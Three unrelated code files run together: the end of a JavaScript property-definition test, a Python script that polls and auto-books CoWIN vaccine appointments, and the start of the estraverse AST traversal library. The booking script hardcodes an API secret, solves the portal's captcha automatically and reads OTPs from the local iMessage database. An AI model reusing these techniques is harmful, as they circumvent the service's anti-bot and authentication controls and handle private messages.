get: get_fun
});
try {
Object.defineProperties(arr, {
"1": {
get: undefined
}
});
$ERROR("Expected an exception.");
} catch (e) {
verifyEqualTo(arr, "1", get_fun());
verifyNotEnumerable(arr, "1");
verifyNotConfigurable(arr, "1");
if (!(e instanceof TypeError)) {
$ERROR("Expected TypeError, got " + e);
}
}
|
import json
import pandas as pd
import re
import sqlite3
from collections import Counter
from hashlib import sha256
from pathlib import Path
import copy
import datetime
import random
import requests
import sys
import tabulate
import time
from inputimeout import inputimeout, TimeoutOccurred
from captcha import captcha_builder
BOOKING_URL = "https://cdn-api.co-vin.in/api/v2/appointment/schedule"
BENEFICIARIES_URL = "https://cdn-api.co-vin.in/api/v2/appointment/beneficiaries"
CALENDAR_URL_DISTRICT = "https://cdn-api.co-vin.in/api/v2/appointment/sessions/calendarByDistrict?district_id={0}&date={1}"
CALENDAR_URL_PINCODE = "https://cdn-api.co-vin.in/api/v2/appointment/sessions/calendarByPin?pincode={0}&date={1}"
CAPTCHA_URL = "https://cdn-api.co-vin.in/api/v2/auth/getRecaptcha"
OTP_PUBLIC_URL = 'https://cdn-api.co-vin.in/api/v2/auth/public/generateOTP'
OTP_PRO_URL = 'https://cdn-api.co-vin.in/api/v2/auth/generateMobileOTP'
WARNING_BEEP_DURATION = (1000, 2000)
try:
import winsound
except ImportError:
import os
if sys.platform == "darwin":
def beep(freq, duration):
# brew install SoX --> install SOund eXchange universal sound sample translator on mac
os.system(
f"play -n synth {duration/1000} sin {freq} >/dev/null 2>&1")
else:
def beep(freq, duration):
# apt-get install beep --> install beep package on linux distros before running
os.system('beep -f %s -l %s' % (freq, duration))
else:
def beep(freq, duration):
winsound.Beep(freq, duration)
def viable_options(resp, minimum_slots, min_age_booking, fee_type, dose):
options = []
if len(resp['centers']) >= 0:
for center in resp['centers']:
for session in center['sessions']:
# availability = session['available_capacity']
availability = session['available_capacity_dose1'] if dose == 1 else session['available_capacity_dose2']
if (availability >= minimum_slots) \
and (session['min_age_limit'] <= min_age_booking)\
and (center['fee_type'] in fee_type):
out = {
'name': center['name'],
'district': center['district_name'],
'pincode': center['pincode'],
'center_id': center['center_id'],
'available': availability,
'date': session['date'],
'slots': session['slots'],
'session_id': session['session_id']
}
options.append(out)
else:
pass
else:
pass
return options
def display_table(dict_list):
"""
This function
1. Takes a list of dictionary
2. Add an Index column, and
3. Displays the data in tabular format
"""
header = ['idx'] + list(dict_list[0].keys())
rows = [[idx + 1] + list(x.values()) for idx, x in enumerate(dict_list)]
print(tabulate.tabulate(rows, header, tablefmt='grid'))
def display_info_dict(details):
for key, value in details.items():
if isinstance(value, list):
if all(isinstance(item, dict) for item in value):
print(f"\t{key}:")
display_table(value)
else:
print(f"\t{key}\t: {value}")
else:
print(f"\t{key}\t: {value}")
def confirm_and_proceed(collected_details):
print("\n================================= Confirm Info =================================\n")
display_info_dict(collected_details)
confirm = input("\nProceed with above info (y/n Default y) : ")
confirm = confirm if confirm else 'y'
if confirm != 'y':
print("Details not confirmed. Exiting process.")
os.system("pause")
sys.exit()
def save_user_info(filename, details):
print("\n================================= Save Info =================================\n")
save_info = input("Would you like to save this as a JSON file for easy use next time?: (y/n Default y): ")
save_info = save_info if save_info else 'y'
if save_info == 'y':
with open(filename, 'w') as f:
json.dump(details, f)
print(f"Info saved to {filename} in {os.getcwd()}")
def get_saved_user_info(filename):
with open(filename, 'r') as f:
data = json.load(f)
return data
def collect_user_details(request_header):
# Get Beneficiaries
print("Fetching registered beneficiaries.. ")
beneficiary_dtls = get_beneficiaries(request_header)
if len(beneficiary_dtls) == 0:
print("There should be at least one beneficiary. Exiting.")
os.system("pause")
sys.exit(1)
# Make sure all beneficiaries have the same type of vaccine
vaccine_types = [beneficiary['vaccine'] for beneficiary in beneficiary_dtls]
statuses = [beneficiary['status'] for beneficiary in beneficiary_dtls]
if len(set(statuses)) > 1:
print("\n================================= Important =================================\n")
print(f"All beneficiaries in one attempt should be of same vaccination status (same dose). Found {statuses}")
os.system("pause")
sys.exit(1)
vaccines = set(vaccine_types)
if len(vaccines) > 1 and ('' in vaccines):
vaccines.remove('')
vaccine_types.remove('')
print("\n================================= Important =================================\n")
print(f"Some of the beneficiaries have a set vaccine preference ({vaccines}) and some do not.")
print("Results will be filtered to show only the set vaccine preference.")
os.system("pause")
if len(vaccines) != 1:
print("\n================================= Important =================================\n")
print(f"All beneficiaries in one attempt should have the same vaccine type. Found {len(vaccines)}")
os.system("pause")
sys.exit(1)
vaccine_type = vaccine_types[0]
if not vaccine_type:
print("\n================================= Vaccine Info =================================\n")
vaccine_type = get_vaccine_preference()
print("\n================================= Location Info =================================\n")
# get search method to use
search_option = input(
"""Search by Pincode? Or by State/District? \nEnter 1 for Pincode or 2 for State/District. (Default 2) : """)
if not search_option or int(search_option) not in [1, 2]:
search_option = 2
else:
search_option = int(search_option)
if search_option == 2:
# Collect vaccination center preferance
location_dtls = get_districts(request_header)
else:
# Collect vaccination center preferance
location_dtls = get_pincodes()
print("\n================================= Additional Info =================================\n")
# Set filter condition
minimum_slots = input(f'Filter out centers with availability less than ? Minimum {len(beneficiary_dtls)} : ')
if minimum_slots:
minimum_slots = int(minimum_slots) if int(minimum_slots) >= len(beneficiary_dtls) else len(beneficiary_dtls)
else:
minimum_slots = len(beneficiary_dtls)
# Get refresh frequency
refresh_freq = input('How often do you want to refresh the calendar (in seconds)? Default 15. Minimum 5. : ')
refresh_freq = int(refresh_freq) if refresh_freq and int(refresh_freq) >= 5 else 15
# Get search start date
start_date = input(
'\nSearch for next seven day starting from when?\nUse 1 for today, 2 for tomorrow, or provide a date in the format DD-MM-YYYY. Default 2: ')
if not start_date:
start_date = 2
elif start_date in ['1', '2']:
start_date = int(start_date)
else:
try:
datetime.datetime.strptime(start_date, '%d-%m-%Y')
except ValueError:
print('Invalid Date! Proceeding with tomorrow.')
start_date = 2
# Get preference of Free/Paid option
fee_type = get_fee_type_preference()
print("\n=========== CAUTION! =========== CAUTION! CAUTION! =============== CAUTION! =======\n")
print("===== BE CAREFUL WITH THIS OPTION! AUTO-BOOKING WILL BOOK THE FIRST AVAILABLE CENTRE, DATE, AND A RANDOM SLOT! =====")
auto_book = input("Do you want to enable auto-booking? (yes-please or no) Default no: ")
auto_book = 'no' if not auto_book else auto_book
collected_details = {
'beneficiary_dtls': beneficiary_dtls,
'location_dtls': location_dtls,
'search_option': search_option,
'minimum_slots': minimum_slots,
'refresh_freq': refresh_freq,
'auto_book': auto_book,
'start_date': start_date,
'vaccine_type': vaccine_type,
'fee_type': fee_type
}
return collected_details
def check_calendar_by_district(request_header, vaccine_type, location_dtls, start_date, minimum_slots, min_age_booking, fee_type, dose):
"""
This function
1. Takes details required to check vaccination calendar
2. Filters result by minimum number of slots available
3. Returns False if token is invalid
4. Returns list of vaccination centers & slots if available
"""
try:
print('===================================================================================')
today = datetime.datetime.today()
base_url = CALENDAR_URL_DISTRICT
if vaccine_type:
base_url += f"&vaccine={vaccine_type}"
options = []
for location in location_dtls:
resp = requests.get(base_url.format(location['district_id'], start_date), headers=request_header)
if resp.status_code == 401:
print('TOKEN INVALID')
return False
elif resp.status_code == 200:
resp = resp.json()
if 'centers' in resp:
print(f"Centers available in {location['district_name']} from {start_date} as of {today.strftime('%Y-%m-%d %H:%M:%S')}: {len(resp['centers'])}")
options += viable_options(resp, minimum_slots, min_age_booking, fee_type, dose)
else:
pass
for location in location_dtls:
if location['district_name'] in [option['district'] for option in options]:
for _ in range(2):
beep(location['alert_freq'], 150)
return options
except Exception as e:
print(str(e))
beep(WARNING_BEEP_DURATION[0], WARNING_BEEP_DURATION[1])
def check_calendar_by_pincode(request_header, vaccine_type, location_dtls, start_date, minimum_slots, min_age_booking, fee_type, dose):
"""
This function
1. Takes details required to check vaccination calendar
2. Filters result by minimum number of slots available
3. Returns False if token is invalid
4. Returns list of vaccination centers & slots if available
"""
try:
print('===================================================================================')
today = datetime.datetime.today()
base_url = CALENDAR_URL_PINCODE
if vaccine_type:
base_url += f"&vaccine={vaccine_type}"
options = []
for location in location_dtls:
resp = requests.get(base_url.format(location['pincode'], start_date), headers=request_header)
if resp.status_code == 401:
print('TOKEN INVALID')
return False
elif resp.status_code == 200:
resp = resp.json()
if 'centers' in resp:
print(f"Centers available in {location['pincode']} from {start_date} as of {today.strftime('%Y-%m-%d %H:%M:%S')}: {len(resp['centers'])}")
options += viable_options(resp, minimum_slots, min_age_booking, fee_type, dose)
else:
pass
for location in location_dtls:
if int(location['pincode']) in [option['pincode'] for option in options]:
for _ in range(2):
beep(location['alert_freq'], 150)
return options
except Exception as e:
print(str(e))
beep(WARNING_BEEP_DURATION[0], WARNING_BEEP_DURATION[1])
def generate_captcha(request_header):
print('================================= GETTING CAPTCHA ==================================================')
resp = requests.post(CAPTCHA_URL, headers=request_header)
print(f'Captcha Response Code: {resp.status_code}')
if resp.status_code == 200:
return captcha_builder(resp.json())
def book_appointment(request_header, details):
"""
This function
1. Takes details in json format
2. Attempts to book an appointment using the details
3. Returns True or False depending on Token Validity
"""
try:
valid_captcha = True
while valid_captcha:
captcha = generate_captcha(request_header)
details['captcha'] = captcha
print('================================= ATTEMPTING BOOKING ==================================================')
resp = requests.post(BOOKING_URL, headers=request_header, json=details)
print(f'Booking Response Code: {resp.status_code}')
print(f'Booking Response : {resp.text}')
if resp.status_code == 401:
print('TOKEN INVALID')
return False
elif resp.status_code == 200:
beep(WARNING_BEEP_DURATION[0], WARNING_BEEP_DURATION[1])
print('############## BOOKED! ############################ BOOKED! ##############')
print(" Hey, Hey, Hey! It's your lucky day! ")
print('\nPress any key thrice to exit program.')
os.system("pause")
os.system("pause")
os.system("pause")
sys.exit()
elif resp.status_code == 400:
print(f'Response: {resp.status_code} : {resp.text}')
pass
else:
print(f'Response: {resp.status_code} : {resp.text}')
return True
except Exception as e:
print(str(e))
beep(WARNING_BEEP_DURATION[0], WARNING_BEEP_DURATION[1])
def check_and_book(request_header, beneficiary_dtls, location_dtls, search_option, **kwargs):
"""
This function
1. Checks the vaccination calendar for available slots,
2. Lists all viable options,
3. Takes user's choice of vaccination center and slot,
4. Calls function to book appointment, and
5. Returns True or False depending on Token Validity
"""
try:
min_age_booking = get_min_age(beneficiary_dtls)
minimum_slots = kwargs['min_slots']
refresh_freq = kwargs['ref_freq']
auto_book = kwargs['auto_book']
start_date = kwargs['start_date']
vaccine_type = kwargs['vaccine_type']
fee_type = kwargs['fee_type']
dose = 2 if [beneficiary['status'] for beneficiary in beneficiary_dtls][0] == 'Partially Vaccinated' else 1
if isinstance(start_date, int) and start_date == 2:
start_date = (datetime.datetime.today() + datetime.timedelta(days=1)).strftime("%d-%m-%Y")
elif isinstance(start_date, int) and start_date == 1:
start_date = datetime.datetime.today().strftime("%d-%m-%Y")
else:
pass
if search_option == 2:
options = check_calendar_by_district(request_header, vaccine_type, location_dtls, start_date,
minimum_slots, min_age_booking, fee_type, dose)
else:
options = check_calendar_by_pincode(request_header, vaccine_type, location_dtls, start_date,
minimum_slots, min_age_booking, fee_type, dose)
if isinstance(options, bool):
return False
options = sorted(options,
key=lambda k: (k['district'].lower(), k['pincode'],
k['name'].lower(),
datetime.datetime.strptime(k['date'], "%d-%m-%Y"))
)
tmp_options = copy.deepcopy(options)
if len(tmp_options) > 0:
cleaned_options_for_display = []
for item in tmp_options:
item.pop('session_id', None)
item.pop('center_id', None)
cleaned_options_for_display.append(item)
display_table(cleaned_options_for_display)
if auto_book == 'yes-please':
print("AUTO-BOOKING IS ENABLED. PROCEEDING WITH FIRST CENTRE, DATE, and RANDOM SLOT.")
option = options[0]
random_slot = random.randint(1, len(option['slots']))
choice = f'1.{random_slot}'
else:
choice = inputimeout(
prompt='----------> Wait 20 seconds for updated options OR \n----------> Enter a choice e.g: 1.4 for (1st center 4th slot): ',
timeout=20)
else:
for i in range(refresh_freq, 0, -1):
msg = f"No viable options. Next update in {i} seconds.."
print(msg, end="\r", flush=True)
sys.stdout.flush()
time.sleep(1)
choice = '.'
except TimeoutOccurred:
time.sleep(1)
return True
else:
if choice == '.':
return True
else:
try:
choice = choice.split('.')
choice = [int(item) for item in choice]
print(f'============> Got Choice: Center #{choice[0]}, Slot #{choice[1]}')
new_req = {
'beneficiaries': [beneficiary['bref_id'] for beneficiary in beneficiary_dtls],
'dose': 2 if [beneficiary['status'] for beneficiary in beneficiary_dtls][0] == 'Partially Vaccinated' else 1,
'center_id' : options[choice[0] - 1]['center_id'],
'session_id': options[choice[0] - 1]['session_id'],
'slot' : options[choice[0] - 1]['slots'][choice[1] - 1]
}
print(f'Booking with info: {new_req}')
return book_appointment(request_header, new_req)
except IndexError:
print("============> Invalid Option!")
os.system("pause")
pass
def get_vaccine_preference():
print("It seems you're trying to find a slot for your first dose. Do you have a vaccine preference?")
preference = input("Enter 0 for No Preference, 1 for COVISHIELD, 2 for COVAXIN, or 3 for SPUTNIK V. Default 0 : ")
preference = int(preference) if preference and int(preference) in [0, 1, 2, 3] else 0
if preference == 1:
return 'COVISHIELD'
elif preference == 2:
return 'COVAXIN'
elif preference == 3:
return 'SPUTNIK V'
else:
return None
def get_fee_type_preference():
print("\nDo you have a fee type preference?")
preference = input("Enter 0 for No Preference, 1 for Free Only, or 2 for Paid Only. Default 0 : ")
preference = int(preference) if preference and int(preference) in [0, 1, 2] else 0
if preference == 1:
return ['Free']
elif preference == 2:
return ['Paid']
else:
return ['Free', 'Paid']
def get_pincodes():
locations = []
pincodes = input("Enter comma separated pincodes to monitor: ")
for idx, pincode in enumerate(pincodes.split(',')):
pincode = {
'pincode': pincode,
'alert_freq': 440 + ((2 * idx) * 110)
}
locations.append(pincode)
return locations
def get_districts(request_header):
"""
This function
1. Lists all states, prompts to select one,
2. Lists all districts in that state, prompts to select required ones, and
3. Returns the list of districts as list(dict)
"""
states = requests.get('https://cdn-api.co-vin.in/api/v2/admin/location/states', headers=request_header)
if states.status_code == 200:
states = states.json()['states']
refined_states = []
for state in states:
tmp = {'state': state['state_name']}
refined_states.append(tmp)
display_table(refined_states)
state = int(input('\nEnter State index: '))
state_id = states[state - 1]['state_id']
districts = requests.get(f'https://cdn-api.co-vin.in/api/v2/admin/location/districts/{state_id}', headers=request_header)
if districts.status_code == 200:
districts = districts.json()['districts']
refined_districts = []
for district in districts:
tmp = {'district': district['district_name']}
refined_districts.append(tmp)
display_table(refined_districts)
reqd_districts = input('\nEnter comma separated index numbers of districts to monitor : ')
districts_idx = [int(idx) - 1 for idx in reqd_districts.split(',')]
reqd_districts = [{
'district_id': item['district_id'],
'district_name': item['district_name'],
'alert_freq': 440 + ((2 * idx) * 110)
} for idx, item in enumerate(districts) if idx in districts_idx]
print(f'Selected districts: ')
display_table(reqd_districts)
return reqd_districts
else:
print('Unable to fetch districts')
print(districts.status_code)
print(districts.text)
os.system("pause")
sys.exit(1)
else:
print('Unable to fetch states')
print(states.status_code)
print(states.text)
os.system("pause")
sys.exit(1)
def get_beneficiaries(request_header):
"""
This function
1. Fetches all beneficiaries registered under the mobile number,
2. Prompts user to select the applicable beneficiaries, and
3. Returns the list of beneficiaries as list(dict)
"""
beneficiaries = requests.get(BENEFICIARIES_URL, headers=request_header)
if beneficiaries.status_code == 200:
beneficiaries = beneficiaries.json()['beneficiaries']
refined_beneficiaries = []
for beneficiary in beneficiaries:
beneficiary['age'] = datetime.datetime.today().year - int(beneficiary['birth_year'])
tmp = {
'bref_id': beneficiary['beneficiary_reference_id'],
'name': beneficiary['name'],
'vaccine': beneficiary['vaccine'],
'age': beneficiary['age'],
'status': beneficiary['vaccination_status']
}
refined_beneficiaries.append(tmp)
display_table(refined_beneficiaries)
print("""
################# IMPORTANT NOTES #################
# 1. While selecting beneficiaries, make sure that selected beneficiaries are all taking the same dose: either first OR second.
# Please do no try to club together booking for first dose for one beneficiary and second dose for another beneficiary.
#
# 2. While selecting beneficiaries, also make sure that beneficiaries selected for second dose are all taking the same vaccine: COVISHIELD OR COVAXIN.
# Please do no try to club together booking for beneficiary taking COVISHIELD with beneficiary taking COVAXIN.
#
# 3. If you're selecting multiple beneficiaries, make sure all are of the same age group (45+ or 18+) as defined by the govt.
# Please do not try to club together booking for younger and older beneficiaries.
###################################################
""")
reqd_beneficiaries = input('Enter comma separated index numbers of beneficiaries to book for : ')
beneficiary_idx = [int(idx) - 1 for idx in reqd_beneficiaries.split(',')]
reqd_beneficiaries = [{
'bref_id': item['beneficiary_reference_id'],
'name': item['name'],
'vaccine': item['vaccine'],
'age': item['age'],
'status': item['vaccination_status']
} for idx, item in enumerate(beneficiaries) if idx in beneficiary_idx]
print(f'Selected beneficiaries: ')
display_table(reqd_beneficiaries)
return reqd_beneficiaries
else:
print('Unable to fetch beneficiaries')
print(beneficiaries.status_code)
print(beneficiaries.text)
os.system("pause")
return []
def get_min_age(beneficiary_dtls):
"""
This function returns a min age argument, based on age of all beneficiaries
:param beneficiary_dtls:
:return: min_age:int
"""
age_list = [item['age'] for item in beneficiary_dtls]
min_age = min(age_list)
return min_age
def generate_token_OTP(mobile, request_header, unattended = False):
"""
This function generate OTP and returns a new token
"""
if not mobile:
print("Mobile number cannot be empty")
os.system('pause')
sys.exit()
valid_token = False
while not valid_token:
try:
data = {"mobile": mobile,
"secret": "U2FsdGVkX1+z/4Nr9nta+2DrVJSv7KS6VoQUSQ1ZXYDx/CJUkWxFYG6P3iM/VW+6jLQ9RDQVzp/RcZ8kbT41xw=="
}
txnId = requests.post(url=OTP_PRO_URL, json=data, headers=request_header)
if txnId.status_code == 200:
print(f"Successfully requested OTP for mobile number {mobile} at {datetime.datetime.today()}..")
txnId = txnId.json()['txnId']
if unattended:
OTP = readOTPfromMacOS()
else:
OTP = input("Enter OTP (If this takes more than 2 minutes, press Enter to retry): ")
if OTP:
data = {"otp": sha256(str(OTP).encode('utf-8')).hexdigest(), "txnId": txnId}
print(f"Validating OTP..")
token = requests.post(url='https://cdn-api.co-vin.in/api/v2/auth/validateMobileOtp', json=data,
headers=request_header)
if token.status_code == 200:
token = token.json()['token']
print(f'Token Generated: {token}')
valid_token = True
return token
else:
print('Unable to Validate OTP')
print(f"Response: {token.text}")
retry = input(f"Retry with {mobile} ? (y/n Default y): ")
retry = retry if retry else 'y'
if retry == 'y':
pass
else:
sys.exit()
else:
print('Unable to Generate OTP')
print(txnId.status_code, txnId.text)
retry = input(f"Retry with {mobile} ? (y/n Default y): ")
retry = retry if retry else 'y'
if retry == 'y':
pass
else:
sys.exit()
except Exception as e:
print(str(e))
def readOTPfromMacOS():
"""
This function reads OTP from iMessage in macOS
:return OTP
"""
wait_for_otp = 10
for i in range(wait_for_otp, 0, -1):
msg = f"Waiting for OTP. Reading OTP in {i} seconds.."
print(msg, end="\r", flush=True)
sys.stdout.flush()
time.sleep(1)
home = str(Path.home())
conn = sqlite3.connect(home + "/Library/Messages/chat.db")
messages = pd.read_sql_query("select * from message order by ROWID desc limit 1", conn)
handles = pd.read_sql_query("select * from handle order by ROWID desc limit 1", conn)
messages.rename(columns={'ROWID': 'message_id'}, inplace=True)
handles.rename(columns={'id': 'phone_number','ROWID': 'handle_id'}, inplace=True)
imessage_df = pd.merge(messages[['text', 'handle_id', 'date', 'is_sent', 'message_id']],
handles[['handle_id', 'phone_number']], on='handle_id', how='left')
for index, row in imessage_df.iterrows():
verification_code_text = row['text']
if "CoWIN" in verification_code_text:
verification_code_text = row['text']
otp = re.findall('(\d{6})', verification_code_text)[0]
return otp
|
/*
Copyright (C) 2012-2013 Yusuke Suzuki <[email protected]>
Copyright (C) 2012 Ariya Hidayat <[email protected]>
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*jslint vars:false, bitwise:true*/
/*jshint indent:4*/
/*global exports:true*/
(function clone(exports) {
'use strict';
var Syntax,
isArray,
VisitorOption,
VisitorKeys,
objectCreate,
objectKeys,
BREAK,
SKIP,
REMOVE;
function ignoreJSHintError() { }
isArray = Array.isArray;
if (!isArray) {
isArray = function isArray(array) {
return Object.prototype.toString.call(array) === '[object Array]';
};
}
function deepCopy(obj) {
var ret = {}, key, val;
for (key in obj) {
if (obj.hasOwnProperty(key)) {
val = obj[key];
if (typeof val === 'object' && val !== null) {
ret[key] = deepCopy(val);
} else {
ret[key] = val;
}
}
}
return ret;
}
function shallowCopy(obj) {
var ret = {}, key;
for (key in obj) {
if (obj.hasOwnProperty(key)) {
ret[key] = obj[key];
}
}
return ret;
}
ignoreJSHintError(shallowCopy);
// based on LLVM libc++ upper_bound / lower_bound
// MIT License
function upperBound(array, func) {
var diff, len, i, current;
len = array.length;
i = 0;
while (len) {
diff = len >>> 1;
current = i + diff;
if (func(array[current])) {
len = diff;
} else {
i = current + 1;
len -= diff + 1;
}
}
return i;
}
function lowerBound(array, func) {
var diff, len, i, current;
len = array.length;
i = 0;
while (len) {
diff = len >>> 1;
current = i + diff;
if (func(array[current])) {
i = current + 1;
len -= diff + 1;
} else {
len = diff;
}
}
return i;
}
ignoreJSHintError(lowerBound);
objectCreate = Object.create || (function () {
function F() { }
return function (o) {
F.prototype = o;
return new F();
};
})();
objectKeys = Object.keys || function (o) {
var keys = [], key;
for (key in o) {
keys.push(key);
}
return keys;
};
function extend(to, from) {
var keys = objectKeys(from), key, i, len;
for (i = 0, len = keys.length; i < len; i += 1) {
key = keys[i];
to[key] = from[key];
}
return to;
}
Syntax = {
AssignmentExpression: 'AssignmentExpression',
AssignmentPattern: 'AssignmentPattern',
ArrayExpression: 'ArrayExpression',
ArrayPattern: 'ArrayPattern',
ArrowFunctionExpression: 'ArrowFunctionExpression',
AwaitExpression: 'AwaitExpression', // CAUTION: It's deferred to ES7.
BlockStatement: 'BlockStatement',
BinaryExpression: 'BinaryExpression',
BreakStatement: 'BreakStatement',
CallExpression: 'CallExpression',
CatchClause: 'CatchClause',
ClassBody: 'ClassBody',
ClassDeclaration: 'ClassDeclaration',
ClassExpression: 'ClassExpression',
ComprehensionBlock: 'ComprehensionBlock', // CAUTION: It's deferred to ES7.
ComprehensionExpression: 'ComprehensionExpression', // CAUTION: It's deferred to ES7.
ConditionalExpression: 'ConditionalExpression',
ContinueStatement: 'ContinueStatement',
DebuggerStatement: 'DebuggerStatement',
DirectiveStatement: 'DirectiveStatement',
DoWhileStatement: 'DoWhileStatement',
EmptyStatement: 'EmptyStatement',
ExportAllDeclaration: 'ExportAllDeclaration',
ExportDefaultDeclaration: 'ExportDefaultDeclaration',
ExportNamedDeclaration: 'ExportNamedDeclaration',
ExportSpecifier: 'ExportSpecifier',
ExpressionStatement: 'ExpressionStatement',
ForStatement: 'ForStatement',
ForInStatement: 'ForInStatement',
ForOfStatement: 'ForOfStatement',
FunctionDeclaration: 'FunctionDeclaration',
FunctionExpression: 'FunctionExpression',
GeneratorExpression: 'GeneratorExpression', // CAUTION: It's deferred to ES7.
Identifier: 'Identifier',
IfStatement: 'IfStatement',
ImportDeclaration: 'ImportDeclaration',
ImportDefaultSpecifier: 'ImportDefaultSpecifier',
ImportNamespaceSpecifier: 'ImportNamespaceSpecifier',
ImportSpecifier: 'ImportSpecifier',
Literal: 'Literal',
LabeledStatement: 'LabeledStatement',
LogicalExpression: 'LogicalExpression',
MemberExpression: 'MemberExpression',
MetaProperty: 'MetaProperty',
MethodDefinition: 'MethodDefinition',
ModuleSpecifier: 'ModuleSpecifier',
NewExpression: 'NewExpression',
ObjectExpression: 'ObjectExpression',
ObjectPattern: 'ObjectPattern',
Program: 'Program',
Property: 'Property',
RestElement: 'RestElement',
ReturnStatement: 'ReturnStatement',
SequenceExpression: 'SequenceExpression',
SpreadElement: 'SpreadElement',
Super: 'Super',
SwitchStatement: 'SwitchStatement',
SwitchCase: 'SwitchCase',
TaggedTemplateExpression: 'TaggedTemplateExpression',
TemplateElement: 'TemplateElement',
TemplateLiteral: 'TemplateLiteral',
ThisExpression: 'ThisExpression',
ThrowStatement: 'ThrowStatement',
TryStatement: 'TryStatement',
UnaryExpression: 'UnaryExpression',
UpdateExpression: 'UpdateExpression',
VariableDeclaration: 'VariableDeclaration',
VariableDeclarator: 'VariableDeclarator',
WhileStatement: 'WhileStatement',
WithStatement: 'WithStatement',
YieldExpression: 'YieldExpression'
};
VisitorKeys = {
AssignmentExpression: ['left', 'right'],
AssignmentPattern: ['left', 'right'],
ArrayExpression: ['elements'],
ArrayPattern: ['elements'],
ArrowFunctionExpression: ['params', 'body'],
AwaitExpression: ['argument'], // CAUTION: It's deferred to ES7.
BlockStatement: ['body'],
BinaryExpression: ['left', 'right'],
BreakStatement: ['label'],
CallExpression: ['callee', 'arguments'],
CatchClause: ['param', 'body'],
ClassBody: ['body'],
ClassDeclaration: ['id', 'superClass', 'body'],
ClassExpression: ['id', 'superClass', 'body'],
ComprehensionBlock: ['left', 'right'], // CAUTION: It's deferred to ES7.
ComprehensionExpression: ['blocks', 'filter', 'body'], // CAUTION: It's deferred to ES7.
ConditionalExpression: ['test', 'consequent', 'alternate'],
ContinueStatement: ['label'],
DebuggerStatement: [],
DirectiveStatement: [],
DoWhileStatement: ['body', 'test'],
EmptyStatement: [],
ExportAllDeclaration: ['source'],
ExportDefaultDeclaration: ['declaration'],
ExportNamedDeclaration: ['declaration', 'specifiers', 'source'],
ExportSpecifier: ['exported', 'local'],
ExpressionStatement: ['expression'],
ForStatement: ['init', 'test', 'update', 'body'],
ForInStatement: ['left', 'right', 'body'],
ForOfStatement: ['left', 'right', 'body'],
FunctionDeclaration: ['id', 'params', 'body'],
FunctionExpression: ['id', 'params', 'body'],
GeneratorExpression: ['blocks', 'filter', 'body'], // CAUTION: It's deferred to ES7.
Identifier: [],
IfStatement: ['test', 'consequent', 'alternate'],
ImportDeclaration: ['specifiers', 'source'],
ImportDefaultSpecifier: ['local'],
ImportNamespaceSpecifier: ['local'],
ImportSpecifier: ['imported', 'local'],
Literal: [],
LabeledStatement: ['label', 'body'],
LogicalExpression: ['left', 'right'],
MemberExpression: ['object', 'property'],
MetaProperty: ['meta', 'property'],
MethodDefinition: ['key', 'value'],
ModuleSpecifier: [],
NewExpression: ['callee', 'arguments'],
ObjectExpression: ['properties'],
ObjectPattern: ['properties'],
Program: ['body'],
Property: ['key', 'value'],
RestElement: [ 'argument' ],
ReturnStatement: ['argument'],
SequenceExpression: ['expressions'],
SpreadElement: ['argument'],
Super: [],
SwitchStatement: ['discriminant', 'cases'],
SwitchCase: ['test', 'consequent'],
TaggedTemplateExpression: ['tag', 'quasi'],
TemplateElement: [],
TemplateLiteral: ['quasis', 'expressions'],
ThisExpression: [],
ThrowStatement: ['argument'],
TryStatement: ['block', 'handler', 'finalizer'],
UnaryExpression: ['argument'],
UpdateExpression: ['argument'],
VariableDeclaration: ['declarations'],
VariableDeclarator: ['id', 'init'],
WhileStatement: ['test', 'body'],
WithStatement: ['object', 'body'],
YieldExpression: ['argument']
};
// unique id
BREAK = {};
SKIP = {};
REMOVE = {};
VisitorOption = {
Break: BREAK,
Skip: SKIP,
Remove: REMOVE
};
function Reference(parent, key) {
this.parent = parent;
this.key = key;
}
Reference.prototype.replace = function replace(node) {
this.parent[this.key] = node;
};
Reference.prototype.remove = function remove() {
if (isArray(this.parent)) {
this.parent.splice(this.key, 1);
return true;
} else {
this.replace(null);
return false;
}
};
function Element(node, path, wrap, ref) {
this.node = node;
this.path = path;
this.wrap = wrap;
this.ref = ref;
}
function Controller() { }
// API:
// return property path array from root to current node
Controller.prototype.path = function path() {
var i, iz, j, jz, result, element;
function addToPath(result, path) {
if (isArray(path)) {
for (j = 0, jz = path.length; j < jz; ++j) {
result.push(path[j]);
}
} else {
result.push(path);
}
}
// root node
if (!this.__current.path) {
return null;
}
// first node is sentinel, second node is root element
result = [];
for (i = 2, iz = this.__leavelist.length; i < iz; ++i) {
element = this.__leavelist[i];
addToPath(result, element.path);
}
addToPath(result, this.__current.path);
return result;
};
// API:
// return type of current node
Controller.prototype.type = function () {
var node = this.current();
return node.type || this.__current.wrap;
};
// API:
// return array of parent elements
Controller.prototype.parents = function parents() {
var i, iz, result;
// first node is sentinel
result = [];
for (i = 1, iz = this.__leavelist.length; i < iz; ++i) {
result.push(this.__leavelist[i].node);
}
return result;
};
// API:
// return current node
Controller.prototype.current = function current() {
return this.__current.node;
};
Controller.prototype.__execute = function __execute(callback, element) {
var previous, result;
result = undefined;
previous = this.__current;
this.__current = element;
this.__state = null;
if (callback) {
result = callback.call(this, element.node, this.__leavelist[this.__leavelist.length - 1].node);
}
this.__current = previous;
return result;
};
// API:
// notify control skip / break
Controller.prototype.notify = function notify(flag) {
this.__state = flag;
};
// API:
// skip child nodes of current node
